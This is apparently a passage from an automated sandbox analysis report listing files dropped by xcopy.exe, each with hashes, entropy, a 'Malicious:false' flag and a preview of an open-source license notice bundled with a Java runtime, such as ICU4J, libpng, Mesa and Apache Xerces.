                                                                                                                                                                                                                                  Preview:## International Components for Unicode (ICU4J) v60.2..### ICU4J License..```..UNICODE, INC. LICENSE AGREEMENT - DATA FILES AND SOFTWARE.Unicode Data Files include all data files under the directories.http://www.unicode.org/Public/, http://www.unicode.org/reports/,.http://www.unicode.org/cldr/data/,.http://source.icu-project.org/repos/icu/, and.http://www.unicode.org/utility/trac/browser/...Unicode Data Files do not include PDF online code charts under the.directory http://www.unicode.org/Public/...Software includes any source code published in the Unicode Standard.or under the directories.http://www.unicode.org/Public/, http://www.unicode.org/reports/,.http://www.unicode.org/cldr/data/,.http://source.icu-project.org/repos/icu/, and.http://www.unicode.org/utility/trac/browser/...NOTICE TO USER: Carefully read the following legal agreement..BY DOWNLOADING, INSTALLING, COPYING OR OTHERWISE USING UNICODE INC.'S.DATA FILES ("DATA FILES"), AND/OR SOFTWARE ("SOFTWARE"),.YOU UNEQUIVOCALLY ACC
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1447
                                                                                                                                                                                                                                  Entropy (8bit):4.528080270649301
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:jjlpTTCb5r9q6kqyiuZLX2DjXkIMmgmlye4ihXSZX3AVmF0RevTIRX2U8Zxa:1pTTIvteiupX2DNtgmlyF2Xi1F0Rjmdi
                                                                                                                                                                                                                                  MD5:C1FA2837B84DA0D9C48466B7F4ED6470
                                                                                                                                                                                                                                  SHA1:C13FC449A215750D85CB8BFF487DB242C2AF1CFF
                                                                                                                                                                                                                                  SHA-256:C987390CB38E2D418F3DDAC07BAEF75647F2A64E75B25A0B4FADAE1F39DBB333
                                                                                                                                                                                                                                  SHA-512:44337F20AE7F2438162CCB554F2A79441E48007F55EFAA330A55BDBBA7F7D9D2ACE2C47C4BD7CBA8ECF41EEE5E57F2063AE004D18D6CD684C8575203E42E0C8C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## CUP Parser Generator for Java v 0.11b..### CUP Parser Generator License..```.Copyright 1996-2015 by Scott Hudson, Frank Flannery, C. Scott Ananian, Michael Petter..Permission to use, copy, modify, and distribute this software and its.documentation for any purpose and without fee is hereby granted, provided.that the above copyright notice appear in all copies and that both.the copyright notice and this permission notice and warranty disclaimer.appear in supporting documentation, and that the names of the authors or.their employers not be used in advertising or publicity pertaining to.distribution of the software without specific, written prior permission...The authors and their employers disclaim all warranties with regard to.this software, including all implied warranties of merchantability and.fitness. In no event shall the authors or their employers be liable for.any special, indirect or consequential damages or any damages whatsoever.resulting from loss of use, data or profits, w
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1104
                                                                                                                                                                                                                                  Entropy (8bit):5.177263520488824
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:jWrRONJHLH0cPP3gtkHw1h39QHGhsUv4eOk4/+jvho3nPR:ytONJbbvE/NQHGhs5eNS3np
                                                                                                                                                                                                                                  MD5:894BAFF13E0AED349B77B465B57F429B
                                                                                                                                                                                                                                  SHA1:932F3D7E8A6307D4EFE7E4BB529C8BEA64E674CB
                                                                                                                                                                                                                                  SHA-256:FC5FDB11A106142EDF2271803029DAB23320714763BFDE5E225450F3D5711F7D
                                                                                                                                                                                                                                  SHA-512:1B1036EF067992B23AD0DAC2F0C3036DB4E786BAAB1AC24A17B7ED2CF610CAC6CDBEE1AF1862C8F72BAE4E256E4425BB884C0084BA1CA4B174AF835135BB1355
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## JRuby Joni v2.1.43..### MIT License.```..Copyright (c) 2017 JRuby Team..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS.OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,.ARIS
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1115
                                                                                                                                                                                                                                  Entropy (8bit):5.1870753062508
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:jGYniJHxRHuyPP3GtIHw1Gg9QHGhsUv4eOk4/+jvho3nPZ:yYniJzfPvGt7ICQHGhs5eNS3nx
                                                                                                                                                                                                                                  MD5:3E20D03F3AB0742D0B0A35BA1215FEDD
                                                                                                                                                                                                                                  SHA1:A68353B6AE21632813BB8CFACC5741703B16FC7E
                                                                                                                                                                                                                                  SHA-256:EF38F6F236AA85BB2C01160F741F0C02EF1A76B80021E3E85CA8DAFC0A6E2883
                                                                                                                                                                                                                                  SHA-512:EB5B02852A54E8072C1D75D6D3FD04D921ACC02E37CB5DC63C2EB4818E3F33B3770A71FE97C97ABFAA0D2481EA3650552E6259972350142FBA14BFBE8753C559
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## jopt-simple v3.0..### MIT License.```..Copyright (c) 2004-2009 Paul R. Holser, Jr...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS.OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTH
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3992
                                                                                                                                                                                                                                  Entropy (8bit):4.656727026124848
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:4K84O6ZloAD2/EViOqSeNDYYJjWdyejpsZ:4K8z6AasE4OUIU2sZ
                                                                                                                                                                                                                                  MD5:78403EDDFD77B7F194AD07541FF1A88C
                                                                                                                                                                                                                                  SHA1:3A2280A0FC1B05A3CCDCD328E6C9D9D47ABDBC66
                                                                                                                                                                                                                                  SHA-256:3B0B5D9C7587A7F194966A793D08F9D81F067457A9A68209DC25C908C03998CE
                                                                                                                                                                                                                                  SHA-512:82A31CC6402B6B1C5D5E527EE93DDF09386AC4CC2CEC2666140FCD38A36993BA8CB799D6280FEC76FC6101370699C0BC831AC9B84DAB5E439CC4052C3C38296D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Independent JPEG Group: JPEG release 6b..### JPEG License.```..Must reproduce following license in documentation and/or other materials.provided with distribution:..The authors make NO WARRANTY or representation, either express or implied,.with respect to this software, its quality, accuracy, merchantability, or.fitness for a particular purpose. This software is provided "AS IS",.and you, its user, assume the entire risk as to its quality and accuracy...This software is copyright (C) 1991-1998, Thomas G. Lane..All Rights Reserved except as specified below...Permission is hereby granted to use, copy, modify, and distribute.this software (or portions thereof) for any purpose, without fee,.subject to these conditions:..(1) If any part of the source code for this software is distributed,.then this README file must be included, with this copyright and no-warranty.notice unaltered; and any additions, deletions, or changes to the original.files must be clearly indicated in accompanying do
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2630
                                                                                                                                                                                                                                  Entropy (8bit):5.23012419800887
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:/kQnDiJzfPvGtXICQH+sfINi3OMFO4+XnDtdfOBFTgqKJfW4AhY9gaXWhk:zYPutYCQHXOaMDTOB6JO3Y9z
                                                                                                                                                                                                                                  MD5:04A8A77CAFDD6185A3506ECCF7A83346
                                                                                                                                                                                                                                  SHA1:1ACBEC21E9EAB8BD2BEE9826353C1E768D5457B5
                                                                                                                                                                                                                                  SHA-256:8ACF00B5EFD25C1C055927222FD3C26B0C9FD02ED02E478C225B64E7A24D9782
                                                                                                                                                                                                                                  SHA-512:A91FAA243A09BDFE62714859B9B4420E8434DD09693A6A280E1C8EF6694FB7858D0171FAE4CA36721B685E3AB8BC8000C5635BF3789250A5B9081130EB4FF57C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Little Color Management System (LCMS) v2.15..### LCMS License.<pre>.README.1ST file information..LittleCMS core is released under MIT License..---------------------------------..Little CMS.Copyright (c) 1998-2023 Marti Maria Saguer..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject.to the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6917
                                                                                                                                                                                                                                  Entropy (8bit):4.868728080688719
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:cDuVlzhu3psX8aB9Mo3AWobRafwOOn6Qu:cuzhu3psX8aB9Mo3kafwOOn6Qu
                                                                                                                                                                                                                                  MD5:6F75AB13B20D4C6BBDB207A5DF282D7A
                                                                                                                                                                                                                                  SHA1:BA86C9938BE37C424D59E13EFE0EC64E53470967
                                                                                                                                                                                                                                  SHA-256:DE52F63E2A34591E42E6352C40C91C98E13452E9D9FBCDA074A3301D0DB8C209
                                                                                                                                                                                                                                  SHA-512:3391DB7828667BE74A158F35E6896794F3BCCCFEEFAF5A08D1D3D8BD63115B0F36EA96A645C73665B9AE4678143775957061A38492CF14A054FF2813A1C5D81D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## libpng v1.6.38..### libpng License.<pre>..COPYRIGHT NOTICE, DISCLAIMER, and LICENSE.=========================================..PNG Reference Library License version 2.---------------------------------------..Copyright (c) 1995-2022 The PNG Reference Library Authors..Copyright (c) 2018-2022 Cosmin Truta.Copyright (c) 1998-2018 Glenn Randers-Pehrson.Copyright (c) 1996-1997 Andreas Dilger.Copyright (c) 1995-1996 Guy Eric Schalnat, Group 42, Inc...The software is supplied "as is", without warranty of any kind,.express or implied, including, without limitation, the warranties.of merchantability, fitness for a particular purpose, title, and.non-infringement. In no event shall the Copyright owners, or.anyone distributing the software, be liable for any damages or.other liability, whether in contract, tort or otherwise, arising.from, out of, or in connection with the software, or the use or.other dealings in the software, even if advised of the possibility.of such damage...Permission is he
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5732
                                                                                                                                                                                                                                  Entropy (8bit):5.1453426112774965
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:FqsVQHfoGKlxESLI1GXVsCGQHlzQUGP+0nWeHGT+weUGP+0nWeHGT+wI:RQHfh4hE1GX1GQH9pqnWeHGySqnWeHGK
                                                                                                                                                                                                                                  MD5:B0F646AC99116CABE48CF7D0A43708B1
                                                                                                                                                                                                                                  SHA1:60228B860A66176C2FAFFA048079103E5F4B69D8
                                                                                                                                                                                                                                  SHA-256:4B326D2B6BC09DA510E3D0F3A1EFF9E26C0E023C309858B6585016EE662C9661
                                                                                                                                                                                                                                  SHA-512:B739AD6B4DC39AD0E2268EA60243DCC11A6A236A0A04488AACBF0103D0C754F1FFC405EC99EAC95A56C312FC63BBE99BA51A1F33D69DFDE37F74979B51732C3F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Mesa 3-D Graphics Library v21.0.3..### Mesa License.```..Copyright (C) 1999-2007 Brian Paul All Rights Reserved...Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS.OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3924
                                                                                                                                                                                                                                  Entropy (8bit):4.826334543557357
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+tC/GvWZpnLtVVuXdfgnWTRshYzxkhXSWR1kM8oT6i6hqgamulkbXdrRjNYRTh5a:vGObLxI0W6hCukJe6i6HDXdrRkTL2
                                                                                                                                                                                                                                  MD5:86CF531AE15B0B5BACAE5F941A6E6750
                                                                                                                                                                                                                                  SHA1:0C036D2463FA269FE183BEBB2EDB637CFDB740D2
                                                                                                                                                                                                                                  SHA-256:B56823253DBA233573F153696A343505832716A050C2AB203C94073F30B63260
                                                                                                                                                                                                                                  SHA-512:ECF934E7F10FBB6808725C310024921CF7E4F03B5EAF1AAEA774DC72D5DFA8DB171CECA791C6C8E00143CDFC34D639043C822D9EBBC307C9C3ADB8C316229254
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## OASIS PKCS #11 Cryptographic Token Interface v3.0..### OASIS PKCS #11 Cryptographic Token Interface License.<pre>..Copyright . OASIS Open 2020. All Rights Reserved... All capitalized terms in the following text have the meanings.assigned to them in the OASIS Intellectual Property Rights Policy (the."OASIS IPR Policy"). The full Policy may be found at the OASIS website:.[http://www.oasis-open.org/policies-guidelines/ipr].. This document and translations of it may be copied and furnished to.others, and derivative works that comment on or otherwise explain it or.assist in its implementation may be prepared, copied, published, and.distributed, in whole or in part, without restriction of any kind,.provided that the above copyright notice and this section are included.on all such copies and derivative works. However, this document itself.may not be modified in any way, including by removing the copyright.notice or references to OASIS, except as needed for the purpose of.developing
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2126
                                                                                                                                                                                                                                  Entropy (8bit):5.172589746189614
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:Bu9OOrXIJHJzI/NNl+eMuj2PMicp32srF32sZEtY17wBHN:5OrXIJHJz+NFMwhp3131EBt
                                                                                                                                                                                                                                  MD5:65933EB0FA6B3C3E93FB30B2F2613131
                                                                                                                                                                                                                                  SHA1:B1783DDCB9E112987DEB97E14D30BE27DF7061D0
                                                                                                                                                                                                                                  SHA-256:12DD724A8014735DEC61B95CA4417476688C07DD1550CC9C1071637806E232A0
                                                                                                                                                                                                                                  SHA-512:4F784BCEA1D66EAA7C56C31D3F2D00061963CA1B437774DBBB7BDBB3E62F92FF426419E075D8FEB82A2F984FAEE4B1573DD175D0C152699B8BBE3313EBC18FAF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## IAIK (Institute for Applied Information Processing and Communication) PKCS#11 wrapper files v1..### IAIK License.```..Copyright (c) 2002 Graz University of Technology. All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:..1. Redistributions of source code must retain the above copyright notice, this. list of conditions and the following disclaimer...2. Redistributions in binary form must reproduce the above copyright notice,. this list of conditions and the following disclaimer in the documentation. and/or other materials provided with the distribution...3. The end-user documentation included with the redistribution, if any, must. include the following acknowledgment:.. "This product includes software developed by IAIK of Graz University of. Technology.".. Alternately, this acknowledgment may appear in the software itself, if and. wherever such third-party
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2126
                                                                                                                                                                                                                                  Entropy (8bit):5.219606113828308
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:PXC6OOrXIJHJz8uCltNonuP7gPrCp32sr3u9tk3hEtI33tEFHN:QOrXIJHJzGoCp3Huzk3h9OFt
                                                                                                                                                                                                                                  MD5:7A73168E2D1D60635D4A477735EF9C46
                                                                                                                                                                                                                                  SHA1:03698BDDF01C463ED4ADD5707136A067F9446551
                                                                                                                                                                                                                                  SHA-256:DA023D685DCF9206EBA77AFF21957E09633084903991BA422625D41EF18E6073
                                                                                                                                                                                                                                  SHA-512:8122E4B9D698632B36085C9A334883756B4499EE5CBB80760F3B1C31D50C9121F788B838664171CCEF20CEBFFA04723D7536004F6DBF31174EDDF2825A55B8D5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## RelaxNGCC v 1.12..### RelaxNGCC License..```..Copyright (c) 2000-2003 Daisuke Okajima and Kohsuke Kawaguchi. .All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:..1. Redistributions of source code must retain the above copyright notice, this. list of conditions and the following disclaimer...2. Redistributions in binary form must reproduce the above copyright notice,. this list of conditions and the following disclaimer in the documentation. and/or other materials provided with the distribution...3. The end-user documentation included with the redistribution, if any, must. include the following acknowledgment:.. "This product includes software developed by Daisuke Okajima. and Kohsuke Kawaguchi (http://relaxngcc.sf.net/)."..Alternately, this acknowledgment may appear in the software itself, if and.wherever such third-party acknowledgments normally appear...
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Algol 68 source, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1597
                                                                                                                                                                                                                                  Entropy (8bit):5.129158378658016
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:OIx0OOYrYJeNrYJFSEz4943J/32sBEtI33tEHN:l0bYrYJeNrYJFSAN393d9ut
                                                                                                                                                                                                                                  MD5:19C79CD6C27E7AA0E4AE4AE2F8D25F66
                                                                                                                                                                                                                                  SHA1:2B95E8949E7D1DCA8DCFC4D822357863FE67341E
                                                                                                                                                                                                                                  SHA-256:8454B0B740CD1FDB98B9A5D56685C872B1C548B6308E5A8E8CFE2164474AC53C
                                                                                                                                                                                                                                  SHA-512:4A98ACC829DC48E185FE418A7DDE6A51C497C343E2C36A2F5CADE2BF7C0DE4AAC8BA8C0F08843BFDEEA23DA72D3FE09EFE877E68F890174F1DFF44B0D143D7B2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## RelaxNG Datatype v1.0..### RelaxNG Datatype License.```..Copyright (c) 2005, 2010 Thai Open Source Software Center Ltd.All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are.met:.. Redistributions of source code must retain the above copyright. notice, this list of conditions and the following disclaimer... Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in. the documentation and/or other materials provided with the. distribution... Neither the names of the copyright holders nor the names of its. contributors may be used to endorse or promote products derived. from this software without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS."AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.LIMITED TO, THE IMPLI
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1168
                                                                                                                                                                                                                                  Entropy (8bit):5.234479012488585
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:jcrmJHHH0yN3gtsaLhP9QHOsUv4eOk4/+/m3oqLFj:4aJHlxE3fQHOs5exm3ogFj
                                                                                                                                                                                                                                  MD5:F566A60D7E2A16EBF1C9D8938635C269
                                                                                                                                                                                                                                  SHA1:5B796B99C8060C4E4AD467A83C859C458A27EA3B
                                                                                                                                                                                                                                  SHA-256:075A8114166C0875C6625312758040FC4514B3893F185452BC73EF5321875947
                                                                                                                                                                                                                                  SHA-512:29118160766447EF8732B9EBE65E1F67F6C7544FCF26A110A967281F0C6DD8FC7858C77B639DA5DFE96D502BA16C03D9710FFE95847150977F393AC77DC8B422
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## RelaxNG Object Model/Parser (RNGOM.jar) v20050510..### RelaxNG Object Model/Parser License.```.Copyright (C) Kohsuke Kawaguchi 2004-2011..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions: The above copyright.notice and this permission notice shall be included in all copies or.substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIA
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11960
                                                                                                                                                                                                                                  Entropy (8bit):4.59509416012808
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Apache Santuario XML Security for Java v2.3.0..### Apache Santuario Notice.```..Apache Santuario - XML Security for Java.Copyright 1999-2021 The Apache Software Foundation..This product includes software developed at.The Apache Software Foundation (http://www.apache.org/)...It was originally based on software copyright (c) 2001, Institute for.Data Communications Systems, <http://www.nue.et-inf.uni-siegen.de/>...The development of this software was partly funded by the European .Commission in the <WebSig> project in the ISIS Programme...Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the speci
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1341
                                                                                                                                                                                                                                  Entropy (8bit):5.134396092780326
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Thai Dictionary..### Thai Dictionary License.```..Copyright (C) 1982 The Royal Institute, Thai Royal Government...Copyright (C) 1998 National Electronics and Computer Technology Center,.National Science and Technology Development Agency,.Ministry of Science Technology and Environment,.Thai Royal Government...Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTI
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2398
                                                                                                                                                                                                                                  Entropy (8bit):5.11945767410343
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Unicode Character Database v6.2 ..### Unicode Character Database..```. UNICODE, INC. LICENSE AGREEMENT - DATA FILES AND SOFTWARE.. See Terms of Use for definitions of Unicode Inc.'s. Data Files and Software... NOTICE TO USER: Carefully read the following legal agreement.. BY DOWNLOADING, INSTALLING, COPYING OR OTHERWISE USING UNICODE INC.'S. DATA FILES ("DATA FILES"), AND/OR SOFTWARE ("SOFTWARE"),. YOU UNEQUIVOCALLY ACCEPT, AND AGREE TO BE BOUND BY, ALL OF THE. TERMS AND CONDITIONS OF THIS AGREEMENT.. IF YOU DO NOT AGREE, DO NOT DOWNLOAD, INSTALL, COPY, DISTRIBUTE OR USE. THE DATA FILES OR SOFTWARE... COPYRIGHT AND PERMISSION NOTICE. Copyright . 1991-2019 Unicode, Inc. All rights reserved.. Distributed under the Terms of Use in https://www.unicode.org/copyright.html... Permission is hereby granted, free of charge, to any person obtaining. a copy of the Unicode data files and any associated documentation. (the "Data Files") or Unicode software and any associated documentation. (the
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12261
                                                                                                                                                                                                                                  Entropy (8bit):4.620411971571462
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Apache Xalan v2.7.2..### Apache Xalan Notice.```.. ======================================================================================. == NOTICE file corresponding to the section 4d of the Apache License, Version 2.0, ==. == in this case for the Apache Xalan distribution. ==. ======================================================================================.. This product includes software developed by. The Apache Software Foundation (http://www.apache.org/)... Specifically, we only include the XSLTC portion of the source from the Xalan distribution. . The Xalan project has two processors: an interpretive one (Xalan Interpretive) and a . compiled one (The XSLT Compiler (XSLTC)). We *only* use the XSLTC part of Xalan; We use. the source from the packages that are part of the XSLTC sources... Portions of this software was originally based on the following:.. - software copyright (c) 1999-2002, Lotus Development Co
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11842
                                                                                                                                                                                                                                  Entropy (8bit):4.611715701079404
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:## Apache Xerces v2.12.2..### Apache Xerces Notice.```. =========================================================================. == NOTICE file corresponding to section 4(d) of the Apache License, ==. == Version 2.0, in this case for the Apache Xerces Java distribution. ==. =========================================================================. . Apache Xerces Java. Copyright 1999-2022 The Apache Software Foundation.. This product includes software developed at. The Apache Software Foundation (http://www.apache.org/)... Portions of this software were originally based on the following:. - software copyright (c) 1999, IBM Corporation., http://www.ibm.com.. - software copyright (c) 1999, Sun Microsystems., http://www.sun.com.. - voluntary contributions made by Paul Eng on behalf of the. Apache Software Foundation that were originally developed at iClick, Inc.,. software copyright (c) 1999..```..### Apache 2.0 License.```..
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11350
                                                                                                                                                                                                                                  Entropy (8bit):4.573308481728409
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:false
